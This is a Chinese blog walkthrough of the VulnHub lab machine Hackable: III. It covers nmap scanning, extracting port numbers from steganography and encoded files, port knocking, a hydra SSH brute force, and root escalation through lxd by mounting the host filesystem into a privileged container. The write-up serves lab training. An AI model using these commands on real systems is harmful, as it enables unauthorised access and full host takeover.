VulnHub靶场----Hackable_3

已于 2022-11-10 00:11:30 修改
阅读量1.7k 收藏 4
点赞数
文章标签: 网络 安全 web安全
于 2022-10-28 19:43:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/127577180
版权

免责声明

文章为作者学习记录,请勿利用文章相关技术从事非法活动,

 如因此产生任何的不良后果与文章作者无关,本文仅供学习参考。

 

靶机:Hackable: III ~ VulnHub

攻击机:VM kali-linux

  1.信息收集

nmap:收集端口服务信息

1、nmap -p- 192.168.56.110
2、nmap -sC -sV -p 22,80 192.168.56.110 -oN nmap.log

发现靶机开放了80端口,22端口filtered

963c80313fa2412e9eb4a055ab71807b.png

2.WEB渗透

访问WEB

访问80端口,得到信息:

1、在元素中发现login_page/login.html网页

2、在元素注释得到用户名jubiscleudo

3、知道可能要port knocking

        端口敲门(端口碰撞)技术是一种通过在一组预先指定的关闭端口上产生连接请求,从外部打开防火墙上的端口的方法。一旦收到正确的连接请求序列,防火墙规则就会被动态修改,以允许发送连接请求的主机通过特定端口进行连接。也就是说,攻击者可能通过端口扫面来利用一些端口服务来发动攻击,但是一些固定的端口又需要开放来满足远程维护需求,因此,我们可以使用端口碰撞技术来形成一个访问控制。我们需要去碰撞一个特定的端口序列,才能够打开我们想要访问的端口。

4、关注.jpg文件

13125bed37e44a25b3ac868862783fa7.png

 目录扫描

发现如下目录

78b79b57f0f34c7ebaa3f84beaf9754e.png

 

访问login_page页面,发现一个登录页面 ,随便输入一些弱口令,出现源码e7ad6493ba5541b59cee6816b6078511.png

 

发现有个3.jpg图片,访问一下,下载图片,分析一波

d392c882811543fe8b208fda053507e5.png

 

图片信息没有什么有用信息,看下是否有隐写

637969feda53498895d2fa8695ed2bdf.png

 

发现有隐写,分离出来

a9896be6e5bd4286a853afb6af302147.png

 

发现一个端口号:65535

e8a5fec3b54742309d16a38bfc8d5662.png

 

 

访问备份目录,发现一个字典,下载下来 887e9f336568436897a3d9730815a460.png

 

访问配置文件,在1.txt中发现base64加密密文

b7b2e9bf6c2042ae9ce43319fb125a37.png

 

base64解码,得到一个端口号:10000

af8477f297054507bca1729f879dda89.png

 

依此访问扫描出来的目录,在css/2.txt中发现混淆加密的密文,解码得到端口号:4444

e16bb646422c4629a6adbfabdd2c0b83.png

 22db8d7d4691404a89c21d3cc1a635d3.png

26c3529e5208448ebcd63f088d404952.png 555a7ffcffd24f00ba451e0e3ede8ac1.png

3.Port Knocking

端口敲门:knock ip port1 port2 port3... 一共6种顺序,最终确定端口顺序如下,敲门后22端口打开529a3432b26c40fbab9035c8ecd19344.png

 

 根据前面得到的用户名和字典爆破SSH

hydra -l 用户名 -P 密码字典 ssh://ip

得到密码:onlymy,尝试登录

a18791ea41d1423eb3027336f9c974b2.png

成功登录SSH,拿到第一个flag,在/home中还有一个用户家目录,但没有权限访问

cf157c76a78a4723908ad2a6cfc10f95.png

4.提权 

d........最后找到一个备份配置文件,打开发现hackable_3和密码,用户与上面家目录名相同,尝试用该密码登录

dde04bb01e6e4e4796afd581786ca050.png

 切换到hackable_3用户,发现在lxd组,利用lid提权

c5e114c8e0f648a0a95c748d62b09d7d.png

 

lxd提权:下载一个镜像,使用镜像创建容器,将容器目录直接映射到物理主机目录,即可在容器中直接访问物理主机的文件

这里在靶机上下不来下,在本地下载好传到靶机上去:

本地执行命令

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder 
./build-alpine
python2 -m SimpleHTTPServer 6789

靶机执行命令

lxc init 指纹 ignite -c security.privileged=true 
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

a06e7696b7844d45a9ccf69e84ce6c6d.png

 

801b41e42ae740d0aa847d8bd8f0e5cd.png

 

查看镜像,这里可以看到指纹FINGERPRINT

e20d5be73e39437b849ffe2d051d6921.png

执行完之后,就提权成功,拿到第二个flag,Game Over!!

3fcf005a5bfd432c85f9180dad589d08.png

 

XiaozaYa
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HACKABLE: III实战演练
龙狼刺的博客
05-24 644
Hackable III
网络探测工具Nmap介绍
new9232的博客
03-24 1531
Nmap是一款用于网络发现和安全审计的网络安全工具。可用于列举网络主机清单、管理服务升级调度、监控主机、监控主机服务运行状况、检测目标主机是否在线和端口开放情况、侦测运行的服务类型及版本信息、侦测操作系统与设备类型等。
linux nmap 扫描已开启的端口
qq_35150992的博客
07-13 1128
此篇文章要用到一个工具nmap 官网:https://nmap.org/ 中文网址:http://www.nmap.com.cn/ 1.安装 centos yum install nmap debian apt-get install nmap 2.详细结果展示 扫描结果首先是显示主机是开启的,对应的端口open表示正常开启,后面的SERVICE是nmap能嗅探到的大致的服务,filtered表示有些端口可能开着,但是没有被程序监听或者被防火墙等其余软件拦截过滤导致状态..
安全开发实战(3)--存活探测与端口扫描
最新发布
weixin_72543266的博客
04-18 1184
本篇主要是对上一篇,通过域名反差ip后,我们需要通过对主机进行存活监测以及存活的端口进行探测.本篇主要是对上一篇反查ip后,对整个ip段或是反查的ip进行存活的端口监测,确定目标主机开放的端口以及对应的服务,通过两种不同的方式进行编写,两种方式各有各的好处吧.t=N7T8t=N7T8安全开发实战​http://t.csdnimg.cn/25N7H。
NMAP 六种端口状态解读
zyqash的博客
02-17 2万+
NMAP 的工作原理 当用 nmap 进行端口测试的时候,不管是检测目标端口是 UDP 还是 TCP ,nmap 都会发送两个一模一样的请求,当 nmap 要重置连接的时候,也会发送两个一模一样的重置连接请求。 NMAP六种端口状态解读 nmap 探测端口返回的值有六种状态,下面正对 TCP 端口和 UDP 端口的探测分别进行说明。 TCP 端口下的六种状态 Open开放状态: nmap 发起两个 SYN 的请求,服务器上监听在此端口的进程会进行应答,会返回 SYN ACK, nmap 收到服.
【2023版】Nmap的概述、安装并进行网络扫描实战
kjuhfkicf154的博客
02-23 2580
Nmap(Network Mapper(网络映射器))是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。
nmap扫描端口filtered“被过滤的分析
csd_ct的专栏
11-22 3万+
最近在做渗透测试时,用nmap扫描目标网站的端口情况,发现某些端口的状态是"filtered",猜测是被防火墙过滤了,那怎么确定端口是否开启或者怎么绕过防火墙进行探测呢?研究了下nmap的高级用法。 1、nmap常用扫描参数 1.1 sT 扫描 3次握手方式的TCP扫描,握手成功后会调用系统的connect函数。由于要完成TCP的3次握手,速度较慢,且这种扫描很容易被检测到,在目标主机的日志中会记录大批的连接请求以及错误信息。nmap默认的扫描方式是这种,如图, ...
DC-9靶机渗透测试
来日可期的博客
08-15 1179
Knockd(也称为敲门守护进程)是一个基于网络安全工具,用于实现一种简单而有效的端口伪装和访问控制机制。它允许用户通过在特定的顺序按“敲门”(发送特定的网络请求)来触发服务器上的特定行为。当正确的敲门序列完成后,服务器将解锁指定的端口或服务,从而允许客户端进行连接
Simple-Yet-Hackable-WhatsApp-api:没有官方的WhatsApp API。 这是一个满足需求的简单python类
04-29
简单但可破解的WhatsApp-api安装要在您的项目中使用此api,您可以从此存储库下载whatsapp.py和emoji.json ,并将其保存在项目的同一文件夹/子文件夹中。 为您的项目创建一个新的.py文件,并使用from whatsapp import...
Eaglejs一个用Vuejs构建的可hackable幻灯片框架
08-08
首先,Eagle.js的核心概念是“hackable”。这意味着它允许开发者深入到框架内部,调整和定制几乎每一个功能,以满足特定的项目需求。这包括但不限于幻灯片的过渡效果、交互行为、样式修改以及内容动态加载等。这种...
snpe-detector-demo-app
05-02
AI Hackable Object Detector-HackMobile 2018演示 SNPE上带有MobileNet-SSD的演示APP。 兼容于 (GPU加速)QRD 8998,QRD 710,Galaxy S8 / S8 +,Galaxy S9 (仅限CPU)Pixel,Pixel 2,HTC One M8 可以在任何...
骇客的圣诞贺卡-项目开发
03-31
至于“hackable-christmas-greeting-card-84d627.pdf”,这很可能是项目的详细步骤指南或者设计文档,包括了材料清单、搭建步骤、编程说明等内容。这个文档将帮助你一步步完成贺卡的制作,确保你能够理解并实施所有...
Android代码-huginn
08-06
Think of it as a hackable version of IFTTT or Zapier on your own server. You always know who has your data. You do. Here are some of the things that you can do with Huginn: Track the weather and ...
VulnHub靶场渗透实战-hackable3
随心所欲不逾矩
11-11 852
靶场环境:Virtualbox(最后总结出来:用新版本导入)网络模式:桥接。靶场难度:中等。结果思路总结:本节使用的工具和漏洞难度中等,涉及到CTF中的隐写术,Brainfuck解密。
nmap端口定义为六种状态的解读
热门推荐
noviceCoder的博客
08-10 3万+
NMAP六种端口状态解读 Nmap是一种用来发现网络中主机和服务的安全扫描工具,从而能够产生一个网络“地图”,为了完成这个功能,nmap会向每个目标主机发送特定的报文,从而从目标主机返回报文(或者无返回报文)来判断目标主机的属性(如:开放的端口,所使用的操作系统,操作系统的类型等信息) 本文主要讨论nmap端口进行扫描中,当nmap向目标主机发送报文并根据返回报文从而认定端口的6种状态的含义
如何让开放端口安全
weixin_33690963的博客
07-06 547
如何让开放端口安全 路由器上开放的端口都是一种安全风险。这也是一种称之为"端口碰撞(port knocking )"技术的价值所在。端口碰撞技术是一种允许访问预先配置好"碰撞"的防火墙服务的技术。所谓的碰撞是由一个尝试访问系统上关闭端口的序列组成。这些尝试要么记录在一个日志中,要么保存在一个后台进程中,通过预先配置这个日志或者进程来监视打开相应端口的序列,如果尝试序...
【每天学习一点新知识】nmap端口扫描
RexHa的博客
01-05 2330
nmap的一些常用语法
VulnHub靶机通关)DC-9
yang1234567898的博客
01-23 752
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP:192.168.43.192 80端口为开放状态,22端口filtered状态 web渗透 访问80端口web服务,打开Search界面,输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破 爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.
../../hackable/uploads/webshell.PHP
07-28
回答: "../../hackable/uploads/webshell.PHP"是一个文件路径,它指向一个名为webshell.PHP的文件,该文件位于hackable目录的两级上级目录中的uploads文件夹中。这个文件路径可能是由于文件上传漏洞导致的,攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值